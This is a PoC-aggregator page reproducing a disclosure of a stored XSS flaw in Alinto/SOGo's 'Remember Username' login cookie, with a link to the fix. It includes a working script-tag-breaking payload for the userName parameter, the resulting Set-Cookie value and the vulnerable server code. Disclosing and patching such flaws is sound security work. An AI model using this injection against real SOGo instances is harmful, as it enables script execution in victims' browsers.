POC详情: 4cc69b409fd2d8d0115c67e88af76d094fea22b9

来源
关联漏洞

疑似Oday

介绍
                                            Stored XSS in cookie Alinto/SOGo 

Researchers: Daniil Khomichenok, Alexander Klimenko

Affected Versions < 5.12.3

Date: 01.10.2025

 **********************************************************************************************
 
When the **"Remember Username"** feature is enabled, a base64-encoded field is added to the browser cookie. 

This value is obtained from the **"userName"** parameter in the **POST** request to the **/SOGo/connect** endpoint.

Server response contains b64 encoded XSS payload with set cookie:

**_Set-Cookie:_ SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;**

Adding the following value to the POST request for the **"userName"** parameter:

<sub> test222@victim.com</script><script>alert('123')</script> </sub>

which contains a **JavaScript injection** that is **_executed_** when the user revisits the authentication page and is stored in the **_"SOGoLogin"_ cookie in the user's browser**.


Code of Auth page, which contains injection:

    <script type="text/javascript">
    var cookieUsername = "test222@victim.com</script><script>alert('123')</script>";
    var language = 'English';
    var loginHint = ''
    </script>

Code of login remember set-cookie which accepts XSS injections as a paramteter value:

    if (rememberLogin)
      [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
      else
      [response addCookie: [self _cookieWithUsername: nil]];


Fix: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c
文件快照

[4.0K] /data/pocs/4cc69b409fd2d8d0115c67e88af76d094fea22b9 └── [1.6K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。